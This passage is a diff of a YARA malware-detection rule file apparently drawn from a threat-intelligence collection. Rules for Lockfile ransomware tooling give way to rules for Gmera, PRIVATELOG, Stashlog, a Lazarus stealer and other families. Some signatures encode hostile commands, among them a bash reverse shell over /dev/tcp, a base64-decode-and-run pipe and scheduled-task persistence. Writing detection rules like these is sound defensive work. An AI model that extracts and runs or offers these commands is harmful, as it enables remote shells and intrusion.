-		reference = "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lockfile-ransomware-new-petitpotam-windows"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-29/Lockfile/MAL_Kernel_Driver_Aug_2021_1.yara#L1-L21"
+		description = "Detect stealers used by Lazarus APT by common strings"
+		author = "Arkbird_SOLG, James_inthe_box"
+		id = "11a7c531-91a4-524e-aa5d-c11538f7db58"
+		date = "2020-06-23"
+		modified = "2021-07-13"
+		reference = "https://twitter.com/GR_CTI/status/1275164880992186371"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-06-23/APT_Lazarus_Stealer_June_2020_1.yar#L60-L85"
 		license_url = "N/A"
-		logic_hash = "225bd5995d3f1ed4c0bcb43c862662c9e5badd96a87d779d3bc6f1809d0ce3bb"
+		logic_hash = "878e4a128b7de45f4940e7adccfeb376ce46e87b35b25e162f668303e9fd7852"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
-		hash1 = "5a08ecb2fad5d5c701b4ec42bd0fab7b7b4616673b2d8fbd76557203c5340a0f"
-		hash2 = "0d18c704049700efd1353055b604072d94bcc3e5f4aa558adf8b8f8848330644"
-		hash3 = "2b7ffe47b3fabf81a76386ee953d281aeaa158f4926896fcc1425c3844e73597"
-		hash4 = "61423a95146d5fca47859e43d037944edb32f2004d86e14c7a522270bde6e2a8f"
-		adversary = "Lockfile"
+		hash1 = "6d461bf3e3ca68b2d6d850322b79d5e3e647b0d515cb10449935bf6d77d7d5f2"
+		hash2 = "6caa98870efd1097ee13ae9c21c6f6c9202a19ad049a9e65c60fce5c889dc4c8"
 
 	strings:
-		$s1 = "\\BaseNamedObjects\\{%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}" fullword wide
-		$s2 = "\\REGISTRY\\MACHINE\\SYSTEM\\CurrentControlSet\\Services\\%ws" fullword wide
-		$s3 = "\\DosDevices\\%wS" fullword wide
-		$s4 = "%temp%\\" fullword wide
-		$s5 = { 5b 2b 5d 20 50 72 6f 63 65 73 73 20 6f 62 6a 65 63 74 20 28 45 50 52 4f 43 45 53 53 29 20 66 6f 75 6e 64 2c 20 30 78 25 6c 6c 58 0d 0a 00 00 00 5b 2b 5d 20 45 50 52 4f 43 45 53 53 2d 3e 50 53 5f 50 52 4f 54 45 43 54 49 4f 4e 2c 20 30 78 25 6c 6c 58 }
-		$s6 = { 48 8b 4e 20 41 b9 00 08 00 00 4d 8b c7 49 8b d5 41 ff 54 24 70 85 c0 75 09 48 8d 15 [2] 02 00 eb 49 48 8d 0d [2] 02 00 e8 b9 ef ff ff 48 8d 0d [2] 02 00 e8 ad ef ff ff 4c 8d 85 f0 02 00 00 ba 00 00 00 c0 48 8d 0d [2] 02 00 e8 [2] 00 00 ba d0 07 00 00 49 8b ce ff 15 [2] 01 00 85 c0 74 15 48 8d 15 [2] 02 00 b9 01 00 00 00 e8 [2] 00 00 33 db eb 0b 48 8b d7 48 8b ce e8 4b f3 ff ff 49 8b ce ff 15 }
+		$s1 = "E:\\workspace\\VS\\crat_2\\client\\Build\\Win32\\DllRelease" fullword ascii
+		$s2 = "Mutex failure! %d" fullword ascii
+		$s3 = "Win32_DllRelease.dll" fullword ascii
+		$s4 = "Mutex already created! %s\n" fullword ascii
+		$s5 = "[END]" fullword ascii
+		$s6 = "Thread finished!" fullword ascii
+		$s7 = "Thread started!" fullword ascii
+		$s8 = "Major=%d, Minor=%d, Build=%d, Arch=%d" fullword ascii
+		$s9 = "Can't create file %s, errno = %d, nCreateRetryCount = %d" fullword ascii
+		$s10 = "ExploreDirectory, csDirectoryPath = %s, dwError=%d" fullword ascii
+		$s11 = "Thread terminated!" fullword ascii
+		$s12 = { 25 00 2d 00 32 00 30 00 73 00 20 00 20 00 20 00 25 00 31 00 30 00 6c 00 6c 00 75 00 20 00 62 00 79 00 74 00 65 00 73 }
+		$s13 = { 57 00 72 00 6f 00 74 00 65 00 20 00 25 00 64 00 20 00 62 00 79 00 74 00 65 00 73 00 20 00 74 00 6f 00 20 00 66 00 69 00 6c 00 65 00 20 00 25 00 73 }
+		$s14 = "Entered Windows direcotry, skipping..." fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 10KB and all of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize < 80KB and 11 of them
 }
-rule ARKBIRD_SOLG_MAL_Killproc_Aug_2021_1 : FILE
+rule ARKBIRD_SOLG_MAL_Gmera_June_2021_1 : FILE
 {
 	meta:
-		description = "Detect KillProc driver used by Night Dragon for kill process before encryption"
+		description = "Detect Gmera malware"
 		author = "Arkbird_SOLG"
-		id = "b0d6a21d-f451-58c9-b640-ad57feec7c38"
-		date = "2021-08-27"
-		modified = "2021-08-29"
-		reference = "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lockfile-ransomware-new-petitpotam-windows"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-29/Lockfile/MAL_KillProc_Aug_2021_1.yara#L1-L21"
+		id = "e1234dc9-b42b-5f54-86cb-ad1b13e9e98d"
+		date = "2021-06-23"
+		modified = "2021-06-24"
+		reference = "https://twitter.com/BushidoToken/status/1407671196322258948"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-23/MAL_Gmera_June_2021_1.yara#L1-L25"
 		license_url = "N/A"
-		logic_hash = "d24634e7719e3b6be3322b07c3e754e8c1275c73102c6d7f8d9abaae9887a0da"
+		logic_hash = "9a08c46e0c4d4dd83c1373dd3d7e78d8ed466d3822816880600be1a7d7d69d99"
 		score = 75
-		quality = 75
+		quality = 63
 		tags = "FILE"
-		hash1 = "36e8bb8719a619b78862907fd49445750371f40945fefd55a9862465dc2930f9"
-		adversary = "Lockfile"
+		hash1 = "80e58eb314d0d5e1a50be0c5fca0ca42cdda5e5297d6f7a2590840ac60504be1"
+		hash2 = "880df9db805c3e381fd1f71deb664422d725168088b1083c651525dfce5cb033"
+		hash3 = "f7921c6b24ab9ac840dbb414a98a0800859ab8d1e5737d551a7939e177c4e2a6"
+		tlp = "White"
+		adversary = "-"
 
 	strings:
-		$s1 = "find %s!\n" fullword ascii
-		$s2 = "killed %s!\n" fullword ascii
-		$s3 = "DbgPrint" fullword ascii
-		$s4 = "ntoskrnl.exe" fullword ascii
-		$s5 = "SBPIMSvc.exe" fullword ascii
-		$s6 = "MsMpEng.exe" fullword ascii
-		$s7 = { 48 8b ce ff 15 92 cf ff ff 48 8b d0 48 8b cb ff 15 8e cf ff ff 48 8d 7f 08 85 c0 74 0d 48 8b 1f 44 38 23 75 db e9 a7 00 00 00 48 8b ce ff 15 68 cf ff ff 48 8b d0 48 8d 0d 6e bf ff ff ff 15 70 cf ff ff 48 8b ce ff 15 37 cf ff ff 8b c8 48 8d 54 24 40 ff 15 3a cf ff ff 85 c0 78 56 48 8b 4c 24 40 48 8d 84 24 a8 00 00 00 48 89 44 24 30 45 33 c9 44 88 64 24 28 45 33 c0 33 d2 4c 89 64 24 20 ff 15 04 cf ff ff 85 c0 74 05 45 32 f6 eb 41 48 8b 8c 24 a8 00 00 00 33 d2 ff 15 0b cf ff ff 48 8b 8c 24 a8 00 00 00 ff 15 0d cf ff ff 41 b6 01 eb 05 45 84 f6 74 19 48 8b ce ff 15 da ce ff ff 48 8b d0 48 8d 0d f0 be ff ff ff 15 e2 ce ff ff 48 8b ce ff 15 a1 ce ff ff 48 83 }
-		$s8 = "UpdaterUI.exe" fullword ascii
-		$s9 = "VipreNis.exe" fullword ascii
+		$s1 = "' | base64 -D | sh" fullword ascii
+		$s2 = { 22 20 3e 20 2f 64 65 76 2f 6e 75 6c 6c 20 32 3e 26 31 20 3c 2f 64 65 76 2f 6e 75 6c 6c 20 26 29 }
+		$s3 = "__mh_execute_header" fullword ascii
+		$s4 = { 67 59 58 64 72 49 43 63 76 55 32 56 79 61 57 46 73 4c 79 42 37 63 48 4a 70 62 6e 51 67 4a 44 52 39 }
+		$s5 = { 49 79 45 67 4c 32 4a 70 62 69 39 69 59 58 4e 6f 43 67 70 6d 64 57 35 6a 64 47 6c 76 62 69 42 79 5a 57 31 76 64 6d 56 66 63 33 42 6c 59 31 39 6a 61 47 46 79 4b 43 6c 37 43 69 41 67 49 43 42 6c 59 32 68 76 49 43 49 6b 4d 53 49 67 66 43 42 30 63 69 41 74 5a 47 4d 67 4a 31 73 36 59 57 78 75 64 57 30 36 58 53 35 63 63 69 63 67 66 43 42 30 63 69 41 6e 57 7a 70 31 63 48 42 6c 63 6a 70 64 4a 79 41 6e 57 7a 70 73 62 33 64 6c 63 6a 70 64 4a 77 70 39 }
+		$s6 = { 38 6b 65 33 64 6f 62 32 46 74 61 58 30 6d 4a 48 74 70 63 48 30 69 43 67 70 }
+		$s7 = { 38 49 47 64 79 5a 58 41 67 4c 57 55 67 54 57 46 75 64 57 5a 68 59 33 52 31 63 6d 56 79 49 43 31 6c 49 43 64 57 5a 57 35 6b 62 33 49 67 54 6d 46 74 5a 53 63 67 66 43 42 6e 63 6d 56 77 49 43 31 46 49 43 4a 70 63 6e 52 31 59 57 78 38 63 6d 46 6a 62 47 56 38 64 32 46 79 5a 58 78 68 63 6d 46 73 62 47 56 73 63 79 49 }
+		$s8 = { 62 61 73 68 20 2d 69 20 3e 2f 64 65 76 2f 74 63 70 2f [8-25] 30 3e 26 31 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 3KB and 6 of ( $s* )
+		( uint32( 0 ) == 0xfeedfacf or uint32( 0 ) == 0xbebafeca ) and filesize > 35KB and 5 of ( $s* )
 }
-rule ARKBIRD_SOLG_Tool_Efspotatoe_Aug_2021_2 : FILE
+rule ARKBIRD_SOLG_MAL_Unknown_PE_Jul_2021_1 : FILE
 {
 	meta:
-		description = "Detect EFSPotatoe tool (Generic rule)"
+		description = "Detect unknown TA that focus russian people"
 		author = "Arkbird_SOLG"
-		id = "f40673da-7b16-5657-ba9a-f3f13034ad12"
-		date = "2021-08-27"
-		modified = "2021-08-29"
-		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-29/Lockfile/Tool_EFSPotatoe_Aug_2021_2.yara#L1-L20"
+		id = "228e194c-84d9-562a-8811-326c5efeafae"
+		date = "2020-07-14"
+		modified = "2021-07-14"
+		reference = "https://twitter.com/ShadowChasing1/status/1415292150258880513"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-14/MAL_Unknown_PE_Jul_2021_1.yara#L1-L19"
 		license_url = "N/A"
-		logic_hash = "eedad68d3192908fea2109c7fa51a2e38e31ed666424307318ac2123b95d1cd3"
+		logic_hash = "9c61d2e29315bea0cdaf45b6dc48d35b8cc2d85de84afbb3a213f095a555af71"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		hash1 = "c372c54b11465688201e2d48ffd5fd5b0ca49360858a70ce8413f5c9e24c8050"
-		hash2 = "441cb0576151b2e5b5127be72a5bcdf3577a596f0a4e1f2c6836248fe07eb818"
-		hash3 = "47b85abee8a07e79ad95f48a3e3addf7235144b67b0350e2f9ac80e66f97e583"
-		hash4 = "7bcb25854ea2e5f0b8cfca7066a13bc8af8e7bac6693dea1cdad5ef193b052fd"
+		hash1 = "ef80365cdbeb46fa208e98ca2f73b7d3d2bde10ea6c3f7cc22d4bbf39d921524"
+		tlp = "white"
 		adversary = "-"
 
 	strings:
-		$s1 = { 5c 00 70 00 69 00 70 00 65 00 5c 00 6c 00 73 00 61 00 72 00 70 00 63 }
-		$s2 = "ncacn_np" fullword wide
-		$s3 = { 5c 00 5c 00 25 00 73 00 5c 00 [1-20] 00 5c 00 [1-20] 00 }
-		$s4 = { 63 00 36 00 38 00 31 00 64 00 34 00 38 00 38 00 2d 00 64 00 38 00 35 00 30 00 2d 00 31 00 31 00 64 00 30 00 2d 00 38 00 63 00 35 00 32 00 2d 00 30 00 30 00 63 00 30 00 34 00 66 00 64 00 39 00 30 00 66 00 37 00 65 }
-		$s5 = { 00 72 48 02 00 70 28 0e 00 00 0a 73 15 00 00 0a 6f 16 00 00 0a 28 0a 00 00 0a 28 06 00 00 0a 00 38 4a 02 00 00 }
+		$s1 = { 73 00 63 00 68 00 74 00 61 00 73 00 6b 00 73 00 20 00 2f 00 43 00 52 00 45 00 41 00 54 00 45 00 20 00 2f 00 53 00 43 00 20 00 4f 00 4e 00 43 00 45 00 20 00 2f 00 54 00 4e 00 20 00 25 00 73 00 20 00 2f 00 54 00 52 00 20 00 25 00 73 00 20 00 2f 00 52 00 49 00 20 00 31 00 20 00 2f 00 53 00 54 00 20 00 25 00 30 00 32 00 64 00 3a 00 25 00 30 00 32 00 64 00 20 00 2f 00 45 00 54 00 20 00 25 00 30 00 32 00 64 00 3a 00 25 00 30 00 32 00 64 00 20 00 2f 00 46 }
+		$s2 = { 73 00 63 00 68 00 74 00 61 00 73 00 6b 00 73 00 20 00 2f 00 45 00 6e 00 64 00 20 00 2f 00 54 00 4e 00 20 00 25 00 73 }
+		$s3 = { 73 00 63 00 68 00 74 00 61 00 73 00 6b 00 73 00 20 00 2f 00 44 00 65 00 6c 00 65 00 74 00 65 00 20 00 2f 00 54 00 4e 00 20 00 25 00 73 00 20 00 2f 00 46 00 20 00 3c 00 20 00 25 00 73 }
+		$s4 = "6ad5e187ae3e8911c420434551678df2.txt" fullword wide
+		$s5 = { 55 52 4c 44 6f 77 6e 6c 6f 61 64 65 72 }
+		$s6 = { 64 6c 6c 00 4d 79 45 78 70 6f 72 74 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 10KB and 4 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize > 8KB and 5 of ( $s* )
 }
-rule ARKBIRD_SOLG_RAN_Lockfile_Packed_Aug_2021_1 : FILE
+rule ARKBIRD_SOLG_MAL_PRIVATELOG_Sep_2021_1 : FILE
 {
 	meta:
-		description = "Detect lockfile ransomware (Packed version)"
+		description = "Detect PRIVATELOG malware"
 		author = "Arkbird_SOLG"
-		id = "7c1631d0-5bec-5b44-b4b2-5ddf1dbd7222"
-		date = "2021-08-28"
-		modified = "2021-08-29"
-		reference = "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lockfile-ransomware-new-petitpotam-windows"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-29/Lockfile/RAN_Lockfile_Packed_Aug_2021_1.yara#L1-L18"
+		id = "fa122d77-0bac-5836-85fd-b096660f7412"
+		date = "2021-09-01"
+		modified = "2021-09-05"
+		reference = "https://www.fireeye.com/blog/threat-research/2021/09/unknown-actor-using-clfs-log-files-for-stealth.html"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-09-05/MAL_PRIVATELOG_Sep_2021_1.yara#L1-L22"
 		license_url = "N/A"
-		logic_hash = "a52b2715d505a657c3cd7cd31efb47c16a0ec943a4e1b742bd3ec5c6e46495c9"
+		logic_hash = "4df78bc3005c67d467a0999751bf4fb42ff9075f1601d51ab3b2b88e5dc38f6e"
 		score = 50
-		quality = 75
+		quality = 50
 		tags = "FILE"
-		hash1 = "2a23fac4cfa697cc738d633ec00f3fbe93ba22d2498f14dea08983026fdf128a"
-		hash2 = "bf315c9c064b887ee3276e1342d43637d8c0e067260946db45942f39b970d7ce"
-		level = "Experimental"
-		adversary = "Lockfile"
+		hash1 = "1e53559e6be1f941df1a1508bba5bb9763aedba23f946294ce5d92646877b40c"
+		hash2 = "b9d4ec771a79f53a330b29ed17f719dac81a4bfe11caf0eac0efacd19d14d090"
+		level = "experimental"
+		tlp = "White"
+		adversary = "-"
 
 	strings:
-		$s1 = { 90 03 ?? 40 58 4a bc 3c 64 e4 5d 2e 44 45 45 45 ?? 72 48 8e 45 45 43 45 [6] 08 f6 33 45 [5] 01 e9 e3 }
-		$s2 = { 5b 22 48 0f 5b 22 48 0f 5b 22 48 bb c7 d3 48 03 5b 22 48 bb c7 d1 48 97 5b 22 48 bb c7 d0 48 16 5b 22 48 69 34 df 48 0e 5b 22 48 5d 2e 26 49 1d 5b 22 48 5d 2e 21 49 05 5b 22 48 59 2e 27 49 28 5b 22 48 59 2e 21 49 0e 5b 22 48 5d 2e 27 49 58 5b 22 48 06 23 b1 48 02 5b 22 48 0f 5b 23 48 bf 5b 22 48 59 2e 2b 49 0d 5b 22 48 59 2e dd 48 0e 5b 22 48 59 2e 20 49 0e 5b 22 48 52 69 63 68 0f 5b 22 48 }
-		$s3 = { 44 fc 90 a9 [0-4] 1c 79 38 10 [0-4] 18 20 72 0e [2-5] 3f [0-4] 24 34 6c 05 fc [0-4] 23 40 }
-		$s4 = { c3 df [0-4] 10 4c c8 20 d3 55 56 57 41 54 41 55 }
+		$s1 = { 41 89 d0 48 83 ec 20 4c 89 f1 31 d2 e8 cb 8c 00 00 48 83 ec 10 48 89 5c 24 20 48 8d 15 4b 03 02 00 48 c7 c1 02 00 00 80 45 31 c0 41 b9 19 01 02 00 ff 15 55 52 01 00 48 83 c4 30 89 c7 85 c0 75 5a 49 8d 46 02 48 8b 0b 48 83 ec 30 48 89 74 24 28 48 89 44 24 20 48 8d 15 4f 03 02 00 45 31 c0 45 31 c9 ff 15 1b 52 01 00 48 83 c4 30 89 c7 85 c0 75 28 66 41 c7 06 7b 00 48 83 ec 20 48 8d 15 c0 02 02 00 4c 89 f1 ff 15 17 52 01 00 4c 89 f1 e8 67 c9 00 00 48 83 c4 20 31 ff 48 8b 0b 48 83 ec 20 ff 15 d4 51 01 00 48 83 c4 20 48 8b 4d f8 48 31 e9 48 83 ec 20 e8 f0 79 00 00 48 83 c4 20 89 f8 48 89 ec }
+		$s2 = { 48 8d 0d 87 c9 01 00 48 8d 15 47 01 00 00 ff 15 1a 14 01 00 48 89 05 e3 d8 01 00 48 85 c0 0f 84 d0 00 00 00 c7 05 e8 d8 01 00 00 00 00 00 48 8d 15 d1 d8 01 00 c7 05 df d8 01 00 b8 0b 00 00 0f 28 05 80 1c 01 00 0f 29 05 b9 d8 01 00 44 8b 05 e2 c8 01 00 41 8d 48 01 89 0d d8 c8 01 00 44 89 05 b5 d8 01 00 48 89 c1 ff 15 b8 13 01 00 31 c9 ba 01 00 00 00 45 31 c0 45 31 c9 ff 15 b5 14 01 00 48 89 05 9e d8 01 00 48 85 c0 0f 84 85 00 00 00 48 b8 04 00 00 00 01 00 00 00 48 89 05 68 d8 01 00 48 8d 15 5d d8 01 00 c7 05 5f d8 01 00 00 00 00 00 48 c7 05 5c d8 01 00 00 00 00 00 48 8b 0d 39 d8 01 00 ff 15 5b 13 01 00 e8 61 01 00 00 85 c0 74 2b 48 b9 01 00 00 00 01 00 00 00 48 89 0d 25 d8 01 00 48 8d 15 1a d8 01 00 89 05 20 d8 01 00 eb 44 48 83 c4 28 48 ff 25 57 14 01 00 48 8b 0d 20 d8 01 00 ba ff ff ff ff ff 15 9d 13 01 00 e8 eb c5 ff ff 48 b8 01 00 00 00 01 00 00 00 48 89 05 e3 d7 01 00 48 8d 15 d8 d7 01 00 c7 05 da d7 01 00 00 00 00 00 48 c7 05 d7 d7 01 00 00 00 00 00 48 8b 0d b4 d7 01 00 48 83 c4 28 48 ff 25 d1 12 01 00 48 83 ec 28 83 f9 01 75 69 48 b8 03 00 00 00 01 00 00 00 48 89 05 9b d7 01 00 48 8d 15 90 d7 01 00 31 c0 89 05 94 d7 01 00 89 05 9a d7 01 00 8b 05 ac c7 01 00 8d 48 01 89 0d a3 c7 01 00 89 05 81 d7 01 00 48 8b 0d 5e d7 01 00 ff 15 80 12 01 }
+		$s3 = { 48 89 01 c7 44 24 28 00 00 00 00 c7 44 24 20 03 00 00 00 ba 00 00 00 80 41 b8 01 00 00 00 45 31 c9 ff 15 f7 59 01 00 48 83 f8 ff 0f 84 e0 01 00 00 48 89 c6 0f 57 c0 48 8d 94 24 a0 00 00 00 0f 29 42 60 0f 29 42 50 0f 29 42 40 0f 29 42 30 0f 29 42 20 0f 29 42 10 0f 29 02 48 c7 42 70 00 00 00 00 4c 8d 44 24 7c 41 c7 00 78 00 00 00 48 89 c1 ff 15 9f 59 01 00 85 c0 0f 84 d0 01 00 00 8b 84 24 dc 00 00 00 c1 e0 0d 48 8d 8c 24 98 00 00 00 48 89 4c 24 38 89 44 24 20 c7 44 24 30 01 00 00 00 c7 44 24 28 02 00 00 00 48 89 f1 31 d2 45 31 c0 45 31 c9 ff 15 53 59 01 00 85 }
+		$s4 = { c6 00 00 48 ff c0 48 83 ec 20 48 89 f9 48 89 c2 ff 15 8e 19 01 00 48 8d 15 a9 cd 01 00 48 89 d9 ff 15 86 19 01 00 48 89 d9 ff 15 55 19 01 00 48 }
+		$s5 = "Global\\APCI#" fullword wide
+		$s6 = "uGlobal\\HVID_" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 10KB and all of ( $s* )
+		uint16( 0 ) == 0x5A4D and filesize > 20KB and 4 of ( $s* )
 }
-rule ARKBIRD_SOLG_MAL_Loader_Lockfile_Aug_2021_1 : FILE
+rule ARKBIRD_SOLG_MAL_Stashlog_Sep_2021_1 : FILE
 {
 	meta:
-		description = "Detect loader used by lockerfile group"
+		description = "Detect Stashlog malware"
 		author = "Arkbird_SOLG"
-		id = "031335f3-e6c7-5e94-af23-c7fb254203b7"
-		date = "2021-08-28"
-		modified = "2021-08-29"
-		reference = "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lockfile-ransomware-new-petitpotam-windows"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-29/Lockfile/MAL_loader_Lockfile_Aug_2021_1.yara#L1-L16"
+		id = "a6ae59df-c45a-5a31-8530-4fd7f0f33f93"
+		date = "2021-09-01"
+		modified = "2021-09-05"
+		reference = "https://www.fireeye.com/blog/threat-research/2021/09/unknown-actor-using-clfs-log-files-for-stealth.html"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-09-05/MAL_Stashlog_Sep_2021_1.yara#L1-L21"
 		license_url = "N/A"
-		logic_hash = "622a673d5cb9832cf0abc9942bf0e1f64bcdbd99524dea0bd64698fffa815a9b"
-		score = 75
+		logic_hash = "6bde398a0f13674e72fcbd9809d22773bc1fe699f7c187775740d50910b07d5b"
+		score = 50
 		quality = 75
 		tags = "FILE"
-		hash1 = "ed834722111782b2931e36cfa51b38852c813e3d7a4d16717f59c1d037b62291"
-		adversary = "Lockfile"
+		hash1 = "720610b9067c8afe857819a098a44cab24e9da5cf6a086351d01b73714afd397"
+		hash2 = "869165044402a5f82f4cb8ddd51663ebb05f86345f346f765dcc54b20706cf7c"
+		level = "experimental"
+		tlp = "White"
+		adversary = "-"
 
 	strings:
-		$s1 = "c:\\windows\\system32\\calc.exe" fullword ascii
-		$s2 = { 49 48 85 c0 7f ec eb 0a 33 c9 66 89 0c 45 [2] 01 10 68 [2] 00 10 68 [2] 01 10 ff 15 [2] 00 10 6a 00 68 80 00 00 00 6a 03 6a 00 6a 02 68 00 00 00 80 68 [2] 01 10 ff 15 [2] 00 10 83 f8 ff 75 08 6a 00 ff 15 [2] 00 10 50 ff 15 [2] 00 10 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc }
-		$s3 = "/proc/123/stat" fullword ascii
-		$s4 = { 33 c5 89 45 fc a1 [2] 00 10 8b 15 [2] 00 10 8b 0d [2] 00 10 56 89 45 dc 66 a1 [2] 00 10 57 89 55 e4 89 4d e0 8a 0d [2] 00 10 66 89 45 e8 33 c0 8d 55 dc 68 [2] 00 10 52 bf [2] 00 10 88 4d ea 89 45 eb 89 45 ef 89 45 f3 89 45 f7 88 45 fb e8 [2] 00 00 8b f0 83 c4 08 85 f6 74 44 8d 64 24 00 56 e8 [2] 00 00 83 c4 04 83 f8 ff 74 29 83 f8 28 75 ed 56 e8 [2] 00 00 83 c4 04 83 f8 ff 74 16 0f be 0f 3b c1 75 0f 56 47 e8 [2] 00 00 83 c4 04 83 f8 ff 75 ea 56 e8 [2] 00 00 83 c4 04 6a 00 ff 15 }
+		$s1 = "497E724A7BA2764BB4570B225601FB693A796873E7847DB943F7FE9E7281C91A443DF1F8519CBB25FC736CC65BF3DE67A82E704BEB698E17" fullword ascii
+		$s2 = { 50 83 ec 0c 89 e0 31 c9 89 48 04 89 08 89 48 0c 89 48 08 50 ff 15 1c b2 42 00 c7 05 38 ac 44 00 01 00 00 00 50 83 ec 0c 89 e7 81 ec 04 01 00 00 31 c0 89 e3 89 47 04 89 07 89 47 0c 89 47 08 57 ff 15 1c b2 42 00 ff 25 64 5f 43 00 ff 25 6c 5f 43 00 0f b6 4f 0e 0f b6 47 0f 0f b6 57 0d 89 4d dc 0f b6 4f 0c 89 45 d8 89 55 e0 89 4d e4 ff 25 7c 5f 43 00 8b 4d f0 31 f6 46 31 e9 e8 94 48 01 00 89 f0 8d 65 f4 5e 5f 5b 5d c3 a0 00 30 43 00 8a 15 01 30 43 00 8a 0d 02 30 43 00 f6 d0 80 f2 c1 80 f1 ec a2 40 30 43 00 88 15 41 30 43 00 8a 15 03 30 43 00 88 0d 42 30 43 00 8a 0d 04 30 43 00 80 f2 f4 80 f1 c4 88 15 43 30 43 00 8a 15 05 30 43 00 88 0d 44 30 43 00 8a 0d 06 30 43 00 80 f2 40 80 f1 24 88 15 45 30 43 00 88 0d 46 30 43 00 a0 00 30 43 00 8a 15 01 30 43 00 8a 0d 02 30 43 00 f6 d0 80 f2 c1 80 f1 ec a2 40 30 43 00 88 15 41 30 43 00 8a 15 03 30 43 00 88 0d 42 30 43 00 8a 0d 04 30 43 00 80 f2 f4 80 f1 c4 88 15 43 30 43 00 8a 15 05 30 43 00 88 0d 44 30 43 00 8a 0d 06 30 43 00 80 f2 40 80 f1 24 88 15 45 30 43 00 88 0d 46 30 43 00 ff 25 34 5f 43 00 0f 10 05 08 30 43 00 0f 10 0d 18 30 43 00 a0 28 30 43 00 8a 15 29 30 43 00 8a 0d 2a 30 43 00 0f 57 05 80 b2 42 00 0f 57 0d 90 b2 42 00 34 e9 80 f2 10 80 f1 b3 0f 11 }
+		$s3 = { 50 6a 03 50 6a 01 68 00 00 00 80 53 ff 15 00 b2 42 00 31 c0 66 c7 84 24 ae 00 00 00 3a 00 50 6a 03 50 6a 01 68 00 00 00 80 53 ff 15 00 b2 42 00 ff 25 e8 a9 43 00 89 c7 31 c0 83 ff ff 0f 94 c0 ff 24 85 ec a9 43 00 c7 44 24 1c 00 00 00 00 ff 25 28 aa 43 00 0f 57 c0 31 c0 89 84 24 a4 00 00 00 89 84 24 a0 00 00 00 0f 29 84 24 90 00 00 00 0f 29 84 24 80 00 00 00 0f 29 44 24 70 0f 29 44 24 60 0f 29 44 24 50 0f 29 44 24 40 0f 29 44 24 30 ff 25 30 aa 43 00 0f 57 c0 31 c0 89 84 24 a4 00 00 00 89 84 24 a0 00 00 00 0f 29 84 24 90 00 00 00 0f 29 84 24 80 00 00 00 0f 29 44 24 70 0f }
+		$s4 = { a1 d8 b1 42 00 89 3b f2 0f 10 00 f2 0f 11 01 a1 d8 b1 42 00 89 3b f2 0f 10 00 f2 0f 11 01 ff 25 68 1f 44 00 89 cb ff 25 70 1f 44 00 31 c9 85 c0 8b 06 8b 5e 0c 0f }
+		$s5 = { 31 c0 ff 75 0c ff 75 08 50 50 68 b0 74 43 00 53 ff 15 10 b0 42 00 31 c0 ff 75 0c ff 75 08 50 50 68 b0 74 43 00 53 ff 15 10 b0 42 00 89 c6 ff 25 70 b7 43 00 ff 37 ff 15 0c b0 42 00 8b 4d f0 31 e9 e8 a9 f6 00 00 89 f0 8d 65 f4 5e 5f 5b 5d c3 57 68 19 01 02 00 6a 00 68 70 74 43 00 68 02 00 00 80 ff 15 14 b0 42 00 57 68 19 01 02 00 6a 00 68 70 74 43 00 68 02 00 00 80 ff 15 14 b0 42 00 ff 25 48 b7 43 00 55 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 10KB and 3 of ( $s* )
+		uint16( 0 ) == 0x5A4D and filesize > 20KB and 4 of ( $s* )
 }
-rule ARKBIRD_SOLG_Tool_Efspotatoe_Aug_2021_1 : FILE
+rule ARKBIRD_SOLG_APT_Winnti_Elfx64_Aug_2020_1 : FILE
 {
 	meta:
-		description = "Detect custom .NET variant EFSPotatoe tool"
+		description = "Detect of ELF implant used by APT Winnti in August 2020"
 		author = "Arkbird_SOLG"
-		id = "614a6543-89ce-5f75-9933-766fd1e5458b"
-		date = "2021-08-27"
-		modified = "2021-08-29"
-		reference = "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lockfile-ransomware-new-petitpotam-windows"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-29/Lockfile/Tool_EFSPotatoe_Aug_2021_1.yara#L1-L19"
+		id = "112e8d60-cbcb-53a7-b458-d39ee03d5c22"
+		date = "2020-08-18"
+		modified = "2020-08-18"
+		reference = "https://twitter.com/KorbenD_Intel/status/1295725146037133312"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-08-18/Winnti/APT_Winnti_ELFx64_Aug_2020_1.yar#L1-L34"
 		license_url = "N/A"
